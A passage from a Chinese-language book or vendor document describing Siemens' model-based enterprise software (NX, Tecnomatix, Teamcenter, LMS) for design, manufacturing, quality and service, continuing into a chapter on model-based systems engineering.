:涵盖工艺BOM管理、工艺分工、零件工艺规划、装配工艺规划、机械运动仿真、公差仿真、人机仿真、装配仿真、工厂规划仿真优化、生产路线仿真优化、MES集成化管理等。通过各种技术最大化地利用MBD模型,开展数字化制造工作。 ·Teamcenter,MBE的全生命周期管理平台 :涵盖智能决策、投资组合、多项目组合管理、需求管理、系统工程、多CAD管理、多学科优化仿真分析管理、数字样机、可视化协同、异地协同、BOM生命周期管理、维护保障管理、企业知识管理等。保障MBD模型以及相关数据能够被有效配置管理,能够在MBE企业内部以及供应链之间流通。 ·LMS,仿真和试验解决方案 :将三维功能仿真、试验系统、智能一维仿真系统、工程咨询服务有机地结合在一起,专注于系统动力学、声音品质、舒适性、耐久性、安全性、能量管理、燃油经济性和排放、流体系统、机电系统仿真等关键性能的开发和研究。 西门子完整的MBE解决方案,以系统工程思想为指导,贯穿从产品需求开始,经过产品设计、产品制造直至产品服务的完整产品全生命周期的过程,在各个阶段的各种信息能够被准确的定义到以MBD模型为核心的技术数据包中,并始终保持上游的技术数据包能够被下游直接重用,一直拓展到生产现场或服务现场。西门子MBE解决方案,是通过综合利用NX为基础的MBD定义工具、Tecnomatix支持MBD模式的数字化制造解决方案、Teamcenter支撑MBE企业产品全生命周期管理平台,LMS支持的仿真和试验,有机形成了从设计、工艺、制造、试验及服务和维护全面的MBE解决方案体系,包括:基于模型的系统工程、基于模型的产品设计、基于模型的分析应用、基于模型的机电一体系统工程、基于模型的全生命周期质量管理、基于模型的工装设计、基于模型的零件工艺、基于模型的装配工艺、基于模型的质量检测、基于模型的作业指导书、基于模型的制造执行、基于模型的实物样机测试——集成的振动噪声、基于模型的MBE供应链管理、基于模型的MBE数字化服务管理、复杂产品的构型管理、基于MBD的标准和规范等。通过这些各种专业的MBE能力灵活应用与组合,可帮助制造企业分阶段、分步骤实现MBE企业能力体系构建。西门子MBE解决方案的总体架构如图2-39所示。 图2-39 西门子MBE解决方案的总体架构 2.4.3 西门子MBE解决方案 西门子MBE解决方案,通过对各项专业MBE能力的灵活组合,以最大的方式保障MBD模型的准确定义、可直接重用、企业内外能快捷访问。 1.基于模型的系统工程解决方案 西门子基于模型的系统工程(MBSE)的解决方案(见图2-40),为复杂产品的研制提供了一个独特的MBD模型驱动的系统工程工作环境,它从需求阶段开始即通过模型(而非文档)的不断演化、迭代递增而实现产品的系统设计;通过模型的结构化定义可以清晰地刻画产品设计初期结构、功能与行为等各方面的需求; 图2-40 基于模型的系统工程解决方案 基于模型可以尽早通过模拟分析发现大量不合理的设计方案;同时模型还为各方提供了一个公共通用的、无二义性的设计信息交流工具,这一点尤其对复杂产品异地分布的系统设计具有重要意义。 2.基于模型的三维产品设计解决方案 西门子MBD模型的三维产品设计解决方案(见图2-41)为实现基于MBD的三维数字化产品研发提供了工具保障。NX知识工程应用实现产品的快速设计:NX重用库帮助企业管理和重用大量的工程数据,产品设计模板实现典型零部件的快速重用,过程向导工具实现知识的积累和应用。NX Check-Mate(一致性质量检查工具),通过可视化方式,对MBD模型数据的合规性和可制造性进行自动验证,确保MBD模型数据的正确性。NX PMI提供了完整的三维标注环境、全面的工具套件,实现MBD模型定义过程的流畅;简单化的创建、放置和编辑,便于MBD模型的快速定义和PMI数据的有序管理。Teamcenter提供了工程协同管理环境,对MBD模型数据及其创建过程的有效管理,便于设计/制造/服务和供应链的全面协同。集成的NX PMI,通过PMI的一次创建,多次多点应用,实现数据重用的最大化。 图2-41 基于模型的三维产品设计解决方案 3.基于模型的设计分析应用解决方案 西门子NX提供CAD/CAE一体化的工具平台,把先进几何创建工具的能力与同步建模技术的速度和灵活性完美地结合在一起,为设计者提供边设计边分析的可能性,极大限度提高对MBD模型直接利用的效率。同时Teamcenter提供统一管理平台,实现设计与仿真数据统一管理,提高了仿真数据查询,分析过程和知识重用的效率,完整的多学科一体化仿真环境,降低了软件使用的复杂度,使得设计与分析工程能够共用一个图形界面环境,易于交流与沟通,有效实现结构与性能等多专业的协同与融合(见图2-42)。 图2-42 基于模型的分析应用 4.基于模型的机电一体化系统工程 LMS将仿真和基于试验的工程方法结合在一起,既可以在开发的早期对子系统进行验证,又可以为最终系统验证提供高效的测试手段。随着LMS Imagine.Lab平台的最新发展,LMS为走向基于模型的系统工程开发流程提供了解决方案。LMS Imagine.Lab采用基于模型的系统工程方法,面向机电一体化系统仿真,为工程师提供了一个从功能需求直到物理建模和仿真的开放开发流程:Imagine.Lab AMESim创建和运行多物理场仿真模型以分析复杂的系统特性,并支持控制系统的设计,从早期的技术参数确定到子系统测试(硬件在环);Imagine.LabSysDM存储和管理横跨不同部门的受控对象和控制系统的模型以及数据;Imagine.Lab System Synthesis对工程设计问题进行综合,根据性能需求创建产品的架构,对不同技术方案以及配置进行综合的工况设定,驱动仿真并对结果进行后处理的综合环境。通过LMS Imagine.Lab功能驱动设计的理念,用户可以在早期开发阶段,分析智能系统的功能特性;在样机测试前,优化机械、液压、气动、热和电子/电气系统间的复杂交互作用;同时,支持工程师对关键功能的主动设计,以提高产品的整体性能和品质;避免主要设计缺陷,探索创新设计,加速产品开发。 5.基于模型的验证管理解决方案 基于Teamcenter平台的验证管理方案,包括用于1D系统仿真管理的Teamcenter与LMS Imagine.Lab集成方案,以及面对广泛3D CAE仿真数据流程管理平台的Teamcenter for Simulation模块,还有针对试验业务流程开发的试验数据流程管理加速方案(Catalyst Solution),三者综合构建成西门子的验证管理解决方案(VerificationManagement)(见图2-43)。该方案能够实现对仿真和试验的数据与流程的有效管理,提高验证工作的协同性,有效存储了基于模型系统工程需求的相关验证数据,并提供了相互校验与工作交流权衡设计方案的平台,记录追踪仿真与试验的过程,保证各项工作的合规性。该方案是基于Teamcenter开发的、柔性化的架构,上述方案可与广泛的第三方工具、试验分析软件集成,为客户带来集成化仿真、试验业务的管理价值,有力地实现对系统的功能验证,推进基于模型的系统工程研发架构落地实施。这些方案是与Teamcenter软件的PDM功能,以及基础的需求管理、项目管理、流程管理、可视化等无缝集成的模块,其功能增强了Teamcenter平台全生命周期解决方案的完整性。 图2-43 基于模型的验证管理解决方案 6.基于模型的全生命周期质量管理解决方案 针对产品全生命周期质量管理,西门子公司提出了Tecnomatix VATM、NX CMM、Tecno-matix DPV组合的基于模型的解决方案,如图2-44所示。在产品设计阶段,VATM直接从MBD模型中提取数模和GD&T(PMI)进行尺寸建模,通过仿真产品的制造和装配过程来预测产品的尺寸质量和偏差源贡献因子,实现MBD模型中公差分配的优化,提高产品设计质量。在工艺规划阶段,NX CMM基于实体模型三维PMI标注驱动的智能化离线编程与虚拟仿真,借助基于模型的PMI信息重用,可有效准确地传递尺寸设计信息,从而确保数字化测量路径规划与虚拟仿真验证结果的可靠性与唯一性,为输出高质量零缺陷的CMM执行程序提供有力支持。在产品生产阶段,DPV通过对实时生产质量信息跟踪、分析和发布,帮助用户及时发现生产过程中的质量问题,通过对制造数据的深度关联分析,寻求问题的根本解决方案,从而提高产品的最终质量,同时提高生产效率并降低生产成本。DPV还可将产品开发过程中制造质量和设计质量挂钩,形成企业质量管理的闭环。以先进的三维容差仿真分析技术,结合高精度坐标测量机与其他检测手段以及生产过程中的尺寸测量规划与验证技术,基于包含产品制造信息的MBD模型为单一信息源和连续载体,实现基于模型的全生命周期质量管理。 图2-44 基于模型的全生命周期质量管理解决方案 7.基于模型的工装设计解决方案(见图2-45) 西门子提供基于MBD的全三维数字化研发模式,将模块化设计的理念应用到工装设计中,通过对工装的模块化分类应用,实现工装设计知识和经验的积累和重用,促进工装的创新设计;实现工装上游数据的有效管理和状态控制,实现工艺工装设计的快速并行协同作业;实现工装数据的全面管理,工装设计结果在资源库中的管理;实现工装数据查询、参考和重用;最终达到缩短周期、改进质量、减少成本的目的。 图2-45 基于模型的工装设计解决方案 8.基于模型的零件工艺解决方案(见图2-46) 基于模型的零件工艺解决方案将协同设计与制造,直接利用设计3D数据进行结构化工艺设计,关联产品、资源、工厂数据,实现了从产品设计到工艺、制造的业务集成,包括:产品设计(数据获取)、工艺设计、工装设计、工艺仿真、工艺卡片与统计报表、MES/ERP集成、知识管理及资源管理。在数字化工艺设计方面,可以及时获取准确设计MBD模型,维护工艺与设计的一致性;提高工艺编制质量与效率,减少错误与返工;相关部门获取实时、准确工艺数据,改进了工作质量和效率;丰富、直观的工艺报表,减少了无效工作时间和出错机会。在制造数据管理方面:与产品相关的设计、工艺、工装、制造、项目管理等部门在统一数据平台协同工作,在正确的时间获取正确的数据,减少差错,提高效率;在数控编程及管理方面:面向产品设计MBD模型的编程,识别零件特征与公差要求,基于典型零件和特征的模板化编程,极大地提高编程效率,改善质量,减少对员工经验的依赖。 图2-46 基于模型的零件工艺解决方案 9.基于模型的装配工艺解决方案 基于模型的装配工艺解决方案,将装配工艺与仿真建立于企业PLM平台之上,充分利用设计MBD模型、资源、工程MBD模型,由流水分工、MBOM创建、结构化工艺设计、工艺仿真与优化、可视化工艺输出、工艺统计报表部分组成,并实现各环节的数据管理,与PLM系统共用制造资源库。系统与产品设计、工装设计、维护维修、试验测试等系统实现数据共享和协同,与ERP、MES实现系统集成。 同时把装配工艺仿真放在PLM环境中统一考虑,提供在PLM环境下的装配工艺仿真能力。可以与数字化装配工艺规划结合起来,为改进产品装配制造过程提供了一个全新的方法和手段,来研究产品的可装配性分析、装配工艺的优化,装配质量的控制,装配工装的验证,以得到保证产品质量,缩短产品生产周期的目的。 10.基于模型的质量检测解决方案(见图2-47) 西门子数字化检测解决方案,提供了从三坐标测量机(CMM)检测编程到三坐标测量检测执行的基于MBD的数字化检测一体化解决方案,涵盖了从制造工程到生产执行的环节。包含NX CMM检测编程和CMM检测执行两大模块。该解决方案通过重用MBD模型,极大地缩短了编程时间(最低可达80%);确保按公司标准检查所有的零部件是否合乎要求;捕捉并分享最佳实践;无需物理部件或机床,就能创建离线程序;有利于在整个流程中快速高效地传达设计变更;简化了软件部署的流程(只需一套系统,就能实现CAD、CAM和CMM);确保最低的培训要求。 图2-47 基于模型的质量检测解决方案 11.基于模型的作业指导书解决方案 基于模型的作业指导(Model-Basic Work Instruction,简称MBI)是整个MBE体系的重要一环,是连接虚拟世界(Product)和物理世界(Production)的纽带和媒介(见图2-48)。传统的媒介一般是纸质媒介,如蓝图、打印的工艺卡片等。 图2-48 MBI是纽带和媒介 MBI是工艺知识的集中展现。如何将格式多样、关系复杂的产品定义、制造过程定义和积累的工艺知识等信息展现到制造现场或维护维修现场,并被现场人员精准、快速地理解和执行,是MBI研究的重要课题。MBI的解决方案水平是体现MBE和数字化制造解决方案水平的重要指标。 作业指导书根据使用介质类型可分为纸质和电子。 作业指导书根据使用实时性可分为脱机和实时联机。 作业指导书从车间执行角度可以分为单向展示和展示/反馈双重功能两种。 作业指导书从能力角度,对应于MBE的能力矩阵(见图2-49),MBI大致可分为以下4个能力层次。 图2-49 MBI的能力矩阵 注:1.3D创作软件仅仅能实现3D作业指导的创作功能,而往往并不具备核心的3D工艺管理。 2.仅仅实现3D电子作业指导文件在线浏览或下载的系统,属于Level 1;仅仅实现2D电子作业指导文件在线浏览或下载的系统,属于Level 0。 ·Level 0 :嵌入二维图和图片的纸质作业指导。一般国产CAPP输出的就是这种格式的工艺卡片。有些系统从三维模型截图嵌入卡片中,也是属于这个能力层次。 ·Level 1 :嵌入三维模型的电子作业指导文件。这种作业指导一般都不需要打印。很多三维创作软件也能实现这种能力的作业指导(注1)。 ·Level 2 :嵌入三维模型的在线作业指导系统。这种作业指导能直接从三维工艺系统中获取结构化的工艺信息(注2)。 ·Level 3 :嵌入三维模型、能反馈的在线作业指导系统。除了Level 2能力,还支持现场执行中的操作记录、过程检验数据、FAI(First Article Inspection,首件检验)等实物技术状态的反馈。这种能力的实现往往需要和MES结合。 12.基于模型的制造执行管理(见图2-50) 西门子提供从产品研发到生产的“一站式”完整解决方案,实现从产品、工艺、工装、工厂的虚拟设计与验证,到产品的实物制造、检测、交付等全过程,实现虚拟世界与实物世界紧密整合,为现代制造业发展提供了新动力。 图2-50 基于模型的制造执行管理 基于MBD的产品、工艺数据精确、实时地下发到生产现场,实现了设计意图的精确数字传递与展示,减少了以往2D、3D多次转换和理解带来精度和时间上的损耗,使工人的操作更规范、便捷,提高了生产效率和产品质量。基于MBD的产品检验更有效地简化手工操作,提高检验精度和效率,并将检验数据与产品模型、标注关联,实现质量数据的统计和分析,达到及早纠正偏差,预防质量问题的发生的目标。实现基于MBD的现场问题反馈,有效减少技术员与工人处理问题的时间,提高工作效率和质量,减少现场停工时间。基于MBD实时数据的采集,再返回PLM系统在实时BOM中进行管理,可有效应用于后期产品维护维修,以及产品改型、改进设计和制造。 13.基于模型的的实物样机测试——集成的振动噪声及疲劳耐久性解决方案(见图2-51) LMS Test.Lab是一套完整的集成振动噪声及疲劳耐久性试验解决方案,包括疲劳耐久性试验、传递路径分析、声学试验、旋转机械试验、结构试验、环境试验、振动控制、电子报告生成及数据管理等,它可以与LMS SCADAS系列数据采集系统高度集成,在统一软硬件平台上完成所有试验室内及外场试验中的测试、数据采集、分析及电子报告生成等任务,确保了整个试验过程的数据准确性及工作的高效性。LMS Test.Lab可以为仿真模型设计早期提供高质量的数据,用于修正仿真模型,或是构建基于试验的部件或子系统的模型,这些模型可以方便地集成到其他仿真平台中,从而提高了仿真模型的精度及建模效率,实现基于模型的仿真设计与试验验证的闭环流程。 图2-51 集成振动噪声试验解决方案 14.基于模型的MBE供应链管理(见图2-52) 图2-52 基于模型的MBE供应链管理 西门子基于Teamcenter平台,提供一套灵活的、成熟的供应链管理解决方案的组合,帮助OEM快速建立完整的供应链管理解决方案,而不需要复杂的集成定制,也极大限度降低供应商的投入。 基于Teamcenter平台的多站点协同的能力、协同社区的能力以及基于公文包的供应关系管理能力,通过灵活组合,可以形成嵌入式、同步协同、异步协同(自助式)、异步协同(赞助式)等四种协同集成模式实现MBD模型的顺畅流通。实现高效的MBE数据交互能力,减少管理成本;支撑广泛供应链内的闭环MBE流程;帮助MBE企业快速构建供应链(各种供应商包括OEM下属单位、战略合作伙伴、各种低成本供应商)全面集成协同与数据交互的能力,同时消除供应链管理中非增值的活动。 15.基于模型的MBE数字化服务管理(见图2-53) 图2-53 基于模型的MBE数字化服务管理 Teamcenter的数字化服务(TC MRO)解决方案可建立完整的产品服务工程,支持维护、维修和大修的功能,从而满足产品服务生命周期管理和企业实物产品管理的需求。提供了整个生命周期的完全的可视性,可以使用配置驱动的产品服务的能力来规划服务运作,优化服务执行,并更好地利用实物产品与零件、工具和设备库存,最大限度地提高服务部门的效率。针对MBE企业,提供基于产品服务所需要的基于MBD模型的IETM(交互式电子技术手册)创建、有效性管理以及多语言翻译管理的全套能力;充分直接利用MBD模型,实现多种实物的可视化展现及分析的能力;提供强大的基于MBD模型的维护维修的虚拟仿真能力;利用TC WEB客户端与TC Mobility(基于IPAD等移动设备的TC),把产品服务所需的技术数据包TDP或IETM快捷延伸到维护现场。数字化服务(TC MRO)解决方案以面向产品全生命周期的视角,通过有效闭环连接产品规划、产品设计、产品制造与产品服务的业务环境,不仅仅提高产品服务的质量、效率和服务知识,同时通过服务反馈来提升产品规划、设计、制造的质量。 16.面向产品全生命周期的构型管理解决方案(见图2-54) 图2-54 面向产品全生命周期的构型管理 Teamcenter作为全球领先的产品全生命周期管理平台,通过其强大的产品配置器、更改管理和全生命周期的信息追溯与管理的能力,为业界提供了最为完善的复杂产品构型管理方案,帮助企业高效自觉履行构型管理的5大功能和37个原则。 ·提供业界最全的产品全生命周期平台,真正涵盖全生命周期业务与数据,为面向全生命周期的构型管理奠定坚实基础。 ·适用于汽车和飞机产品架构管理的最佳的产品配置器,能高效支撑复杂产品的全生命周期BOM管理。 ·严格符合CMII的更改与有效性管理机制,有效贯彻构型管理标准。 ·以需求驱动的信息端到端的关联与追溯,同时实现信息系统对构型管理范畴从虚拟产品到实物产品的拓展,达到全生命周期的构型管理。 ·通过对MBD模型的有效关联与高效重用,真正实现MBE企业内MBD模型的单一数据源,确保模型的技术状态有效管控。 17.MBD标准规范及在西门子软件系统中的实现 基于西门子软件的MBD应用系统包括MBD三维设计系统、MBD三维工艺系统、MBD标准检验系统三部分。 西门子工业软件公司的Teamcenter+NX已经被众多的企业作为实现MBD技术的信息化平台,在国内外得到了广泛的应用,很多企业制定了基于Teamcenter+NX的MBD技术应用规范。这些规范对在Teamcenter+NX进行三维几何模型的创建、三维标准的表达、数据的组织和管理等都进行了规范。针对MBD在数字化设计与工艺中的应用,运用NX OPEN、ITK等开发工具,将MBD的相关标准和规范融入NX与Teamcenter平台,通过定制国标化、规范化、流程化、自动化的工具,构建基于西门子软件的MBD应用系统,帮助客户在已有的产品制造信息PMI技术基础上,方便快捷地完成各流程的设计与定义。 2.4.4 西门子MBE解决方案的价值定位 凭借西门子在工业自动化领域的强大的软硬件全面集成的技术能力,以及完整的产品生命周期管理(PLM)解决方案的能力,西门子工业软件公司在为各制造企业提供MBE的专业技术能力同时,也提供一套完整的MBE解决方案,并将以领先一步的方式帮助制造企业打造MBE能力体系。西门子MBE解决方案与服务: ·为制造企业提供包括MBD模型定义、基于模型的工程(MBe)、基于模型的制造(MBM)和基于模型的服务(MBS)等世界领先的各种MBE专业能力,使其能够在某些具备条件的专业业务领域快速具备MBE的能力,获得MBE的收益。 ·为制造企业提供构建MBE完整能力体系的整体解决方案,可以引领企业逐步平滑的走上MBE的最高等级,减少中间过程繁重的系统集成与数据转换的非增值活动,并以最小成本保障MBE的能力体系能够得以持续的升级优化。 ·通过数字化技术与自动化技术的融合,使制造企业在迈向MBE企业的同时,可逐步走向真正的数字化企业(工厂),通过MBE能力与数字化工厂能力的融合,更大程度降低产品研发成本、缩短新产品上市时间。 ·以西门子中央研究院进行MBE能力技术的突破,通过西门子众多行业企业的实践应用,始终保持领先一步的优势,引领制造企业迈向的MBE的最高境界。 方案篇 TEAMCENTER Teamcenter软件是全球使用最广泛的PLM系统。 Teamcenter将人员与产品和过程知识联系在一起,以支持全球化的、面向生命周期的高效工作,推动创新并提高效率。Teamcenter经过验证的数字化生命周期管理解决方案是在一个开放式的PLM架构的基础之上构建的。 系统工程和需求管理 ——提高客户交付成功产品的能力——通过确保根据产品需求进行开发,使其符合战略意图、市场、客户需求以及法规要求。 组合、计划和项目管理 ——通过持续地控制选择正确的投资组合,使投资回报最大化,组织资源并驱动活动,以便极大地提高业绩。 工程过程管理 ——提供了一个单一的、组织化的、安全的产品工程和过程知识来源。允许不同的开发组作为一个单一实体一起进行工作,而不管所处位置,从而明显地缩短开发时间,提高质量和生产力。 物料清单管理 ——允许公司横跨整个产品生命周期,高效地管理包括设计和工程在内的本质产品定义。 符合性管理 ——提供了一个横跨整个产品生命周期的法规符合性框架,以增强标准,简化管理并降低违规的风险。 内容和文档管理 ——使用Teamcenter集成的内容和文档管理解决方案,可以在管理产品开发所用的相同的PLM环境中管理文档开发/支持。 配方、安装和品牌管理 ——Teamcenter的配方、包装和品牌管理解决方案可将配方产品、包装、设计和品牌信息作为统一的PLM平台的一部分加以管理。 供应商关系管理 ——提供了一个可配置的解决方案组合,利用这些解决方案组合,公司能够通过一个协同的环境来更加高效地参与供应链,支持更好的成本管理以及更高效的产品开发和制造。 机电一体化过程管理 ——提供了一个丰富的环境,在一个产品和过程知识的单一来源中,跨越了每个领域,关联地进行机、电子、电气和嵌入式软件技术开发。 制造过程管理 ——提供了一个单一的、可扩展的、安全的制造数据来源。全面管理产品、过程、资源和工厂,并将这些连接在一起以支持从程到生产的生命周期过程。 仿真过程管理 ——提供了一个单一的、组织化的、安全的仿真数据和过程源。这些都能够嵌入产品生命周期之中,以便更好地评估产品性能和质量,同时提高开发效率。 维护、维修和大修 ——提供了配置驱动的服务数据管理和MRO功能配置驱动,MRO打破了物流、维护与工程社区之间的隔阂,以帮助驱动更具利润的增长。 报告和分析 ——提供了一套高效的功能,用于提取、聚集、分析并传播业务信息,以便帮助企业做出更好的业务决定。 社区协同 ——提供了一个协同的框架,产品信息能够在产品生命周期的所有关键参与者之间沟通,消除功能组之间的障碍,把不同来源的PLM数据集成到一个易用的界面之中。 生命周期可视化 ——提供了经过证明的可视化和虚拟样机功能,允许每个人利用二维文档、图纸以及三维模型来对数据进行可视化处理,分析和沟通数据,使整个企业都能够利用锁定的数据中的知识产权。 企业知识基础和平台可扩展性服务 ——Teamcenter提供的企业知识基础使企业可以将来自多种创作应用程序的产品、过程、制造和服务信息整合到单一的安全知识源中。通过Teamcenter的平台可扩展性服务,可以快速且经济高效地实现Teamcenter投资的价值。 第3章 基于模型的系统工程解决方案 3.1 业务挑战 复杂程度日益增加是产品发展的基本趋势之一。纵观航空、航天、国防、船舶、机车、汽车等各行业,其产品/系统已呈现出功能高度复杂、耦合关联、可重构、跨地域异地设计等诸多特点。与一般产品相比,复杂产品所带来的挑战是:不同领域的子系统间将产生不可预测的功能耦合、交叠甚至冲突,原本功能良好的子系统可能产生不可预测的行为。因此,针对复杂产品,在其概念设计阶段进行系统设计已成为不可缺少的重要一环。 以飞机的研制为例,飞机的开发经历了从物理样机驱动的开发流程到CAD驱动的开发流程的转变。然而,现在飞机设计又面临新的问题:一是因为飞机系统本身越来越复杂,特别是随着多电飞机的发展,越来越多采用智能控制系统。这就使得在传统飞机的开发流程中如何有效地考虑机电一体化系统开发,特别是在开发阶段如何综合地考虑控制系统和受控对象的耦合成为开发的关键之一。二是飞机开发的全球化使得要对来自不同地区不同研发部门或供应商的系统进行集成,特别是在设计早期如何通过系统集成确保飞机设计的成熟性成为全球飞机开发面临的棘手问题。以上第一个问题要求在飞机的开发过程中协调和同步物理系统与电控系统的开发以确保产品的质量;后一个问题就要求在横跨不同地区的部门之间无缝地共享产品方案、设计和分析以确保协同工作。这两方面问题的系统解决方案就是基于模型的系统工程(Model-Based Systems Engineering,简称MBSE),即通过应用模型来支持系统的需求定义、设计、分析、校核和验证,从概念设计阶段开始一直贯穿整个开发流程。 系统工程是基于模型的企业(MBE)的重要指导思想,基于模型的系统工程为基于模型的工程、基于模型的制造、基于模型的维护等MBE企业的关键活动提供了统一的协调接口,因而成为MBE企业研究和应用实践中的重要组成部分。 3.2 解决方案 基于文件的系统工程自20世纪40年代提出以来,对复杂产品的系统设计做出了重要贡献,有力地支持了复杂产品的系统设计。然而,随着产品系统复杂性的不断增加,尤其是异地分布式设计的出现,基于文件的系统工程已越来越无法满足要求,基于模型的系统工程(MBSE),或称系统驱动的产品开发(Systems-Driven Product Development,简称SDPD),正成为复杂产品系统设计的基础。 在国际系统工程学会(INCOSE)发布的系统工程2020年远景规划中,MBSE成为系统工程未来发展的重要方向,图3-1是2007年INCOSE年会发布的MBSE的发展路线图。需要指出的是,西门子工业软件是INCOSE组织的重要成员,特别是在MBSE动议和发展中一直发挥着重要作用。 图3-1 INCOSE发布的MBSE发展路线图 MBSE通过应用模型来支持系统的需求定义、设计、分析、校核和验证。MBSE中的模型与MBD/MBM中的三维数字化模型属于不同的范畴,但在一定程度上可以实现模型间的信息传递。SysML是INCOSE和OMG(对象管理组织)在UML 2.0的基础上进行重用和面向系统工程的扩展而定义的新的系统建模语言标准,如图3-2所示,SysML对对象的定义主要通过其结构模型、行为模型、需求模型和参数模型来完成。其中,结构模型侧重于对系统的层次以及系统间不同对象的相互关联关系进行建模;行为模型主要针对基于功能的和基于状态的行为进行建模;需求模型强调用户需求的层次关系、需求间的追溯关系及设计对需求的满足情况等;参数模型主要强调系统或系统内部部件间的约束关系。MBD/MBM中模型的关键在于将产品的设计信息和制造信息共同定义到其三维数字化模型中,以完整地表达产品定义信息,将三维模型打造成产品研制活动中上下游间信息流转的载体。 图3-2 基于SysML的对象模型定义 为了更好地为客户提供基于系统工程的“V”模型闭环的系统驱动的产品开发支持,很多软件供应商都通过开发和收购的方式不断满足客户在MBSE方面的需求,如西门子收购了业界优秀软件LMS以完善自己对MBSE的支持:通过Teamcenter的系统工程模块实现对复杂系统的RFLP(Requirement、Function、Logical、Physical)支持。通过LMS产品提供多级复杂程度的建模理念,在概念设计阶段和详细设计阶段,分别对应有一维模型和三维模型,实现多级复杂程度的建模;其次,LMS在仿真和试验领域提供独特的解决方案,并将仿真和试验结合起来,在前期可以进行仿真,在后期可以进行试验,从而实现指标、建模、验证组成的闭环系统。 支持MBSE的相关软件,需要为复杂产品的研制提供一个独特的模型驱动的系统工程工作环境,它将需求管理、体系架构、系统建模、系统仿真、系统虚拟验证、实物验证与其他产品和流程知识关联起来,将系统工程与产品全生命周期的管理融为一体,为跨领域、跨部门的复杂产品研制提供统一的信息化管理中枢。 基于模型的系统工程根据系统需求定义的功能来设计整体系统架构,根据该架构的定义,在设计的早期可以把物理系统的模型和控制系统的模型耦合起来建立机电一体化系统的模型,在系统模型的基础上对整体方案进行分析和优化并完成各个子系统的性能指标设定。随后在子系统开发阶段中,通过建立子系统进一步细化的模型,一方面可以审核子系统的性能是否满足系统设计阶段定义的性能指标;另一方面该子系统模型可以替代系统模型中的功能模型,从而可以在整个系统环境中对子系统进行优化。由于不同的部门都是在统一的架构下进行子系统的开发,因此来自于不同部门的子系统模型非常容易进行集成,完成系统的虚拟验证。在设计后期,随着不同部件或者子系统物理样机的出现,又可以将这些物理样机和虚拟的模型结合起来进行仿真,加速物理试验的进程。 1.基于PLM平台的集成化的系统工程环境 集成化的系统工程环境为系统工程和需求管理提供了完全整合的方法,如图3-3所示。在统一的平台上实现需求的解析和确立、功能架构、逻辑设计、物理设计、系统验证,实现系统驱动的产品开发,使企业可以从整体上把握价值链的上下游系统,帮助避免因需求与物理实现不符所导致的成本昂贵的后期系统集成问题。 图3-3 集成化的系统工程环境 基于IT支撑的集成化系统工程平台将产品的系统工程和全生命周期管理有机结合在一起,如图3-4所示。通过在设计流程早期全面理解产品或系统,使生命周期中所涉及的各个部门都能对整个系统有一个全面的了解,企业就可以利用所掌握的知识来更好地权衡影响具体设计、制造、销售、采购和服务决策的各种因素;同时将系统工程与执行联系起来,使参与生命周期流程中的每个人都能够在需要做出决定时从系统层面出发,做出符合初始战略意图的选择。 图3-4 系统工程与全生命周期管理的有机结合 2.需求驱动的产品定义 结构化、集成化的需求管理为企业提供了统一、安全收集和管理客户之声的平台,这里的客户之声包括客户、合同、法规和企业自身标准等各方面的要求。通常的需求管理支持还要提供Live Integration功能。用户可以使用熟悉的Microsoft Office工具创建、编辑和维护需求,这些需求在需求管理环境中以结构化的方式体现。 集成的、结构化的需求管理环境可在整个生命周期内传达需求,将需求与功能、逻辑和物理实现相关联,将需求与项目管理、配置管理、变更管理相关联,需求管理将随着PLM应用的扩展而扩展,借助生命周期管理对需求进行全生命周期的跟踪。 基于需求的产品设计与验证集成环境还可以验证指标和行为的可行性。结构化的需求传递至CAD中成为MBD产品设计的需求源,基于HD3D的可视化业务智能环境,实现需求驱动的产品的设计和基于需求的设计验证。 3.基于模型的系统工程 基于模型系统工程的另一个关键领域是闭环的指标、建模、验证的支撑环境,它为产品开发提供了模型驱动的系统工程环境(见图3-5)。首先,它将系统建模、体系架构、系统仿真和需求管理与公司其余的产品和流程知识关联起来,支持企业对复杂产品的需求、子系统、约束条件和不同专业相结合(将机械设计、电子设计和软件设计综合起来)之后的交互关系进行建模和分析。其次,在产品开发的每一个阶段,无论是前期的架构设计,还是子系统设计,还是部件设计,都可以引入一个验证的环节,实现闭环的产品研发流程。这样形成的产品模型是一个多级复杂程度的模型,可用来实现不同设计阶段、不同专业的验证。 图3-5 模型驱动的系统工程环境 MBSE的闭环环境还需要支持基于SysML/UML的标准数据模型。通过Live Integration功能,实现与Visio图表工具的集成,支持对基于SysML/UML的标准建模工具的集成,实现嵌入式的模型数据管理。以PLM与Visio图表工具的集成为例,通过建立Visio模板库中图形构件与PLM中模型元素的映射关系,开发团队可以在Visio中从面向系统的角度(即从由电气、电子、软件和机械组件构成的跨域解决方案方面考虑)快速地图形化描述复杂的产品,建立构件间的接口及联接,系统中会相应地自动生成产品的体系架构。 基于PLM,结构化方式管理的需求被分配到同样结构化的功能架构中,实现特定需求与特定功能分解的关联,在此基础上对系统整体进行评估和决策。功能架构通过逻辑架构的定义进行实现,通常需要在功能分解的各个层面定义对应的逻辑模型,同时定义各个子系统间的关联关系。以电气系统为例,逻辑设计以图形化的方式定义各个设备的输入、输出,以及与其他设备间的接口关系。基于PLM可以在统一的平台上实现需求模型与功能模型、功能模型与逻辑模型的关联管理,建立产品的集成化架构,实现所谓的“模型网络”,支持产品的系统化决策。 通过此环境可以创建和运行多物理场(机、电、液、热、控等)仿真模型,以分析复杂的系统特性,并支持控制系统的设计,从早期的技术参数确定到子系统测试。也可以对工程设计问题进行综合,根据性能需求创建产品的架构,对不同技术方案以及配置进行综合的工况设定,驱动仿真并对结果进行后处理。 4.系统仿真和分析 虚拟的系统仿真和分析使产品团队可利用模型进行系统的优化设计,评估范围更广的设计方案,减少对物理原型的依赖,减少后期返工的时间和成本损失。通过将PLM与建模和仿真环境相结合,能够实现主系统和分系统多学科协同仿真,可以帮助用户解决从产品概念设计、方案设计到详细的需求设计,如机构设计与动力学分析、控制/传动/电动机驱动等机电系统设计、机电一体化分析、结构有限元分析、振动噪声分析、疲劳耐久性分析、结构优化、模态分析、模型修正、多学科优化等问题,使企业在虚拟世界中及早地进行产品验证,帮助企业监视系统的性能,评估权衡选项。如图3-6所示。 通过PLM可以集成多种仿真工具,如集成MathWorks公司的Matlab/Simulink(主流的多领域仿真和基于模型的设计工具),Maplesoft公司的MapleSim(主流的多领域建模和仿真工具),西门子工业软件的NX等。集成的重点在于通过PLM管理仿真工具的模型,当模型变更时,或者模型在多个产品或配置中被引用时,用户可以快速而准确地找到模型的正确版本进行设计验证。 图3-6 系统仿真和分析 在PLM中企业可以定义量化的系统性能指标,如重量、成本、功率、时间等。同时基于PLM与微软Office的Excel的Live 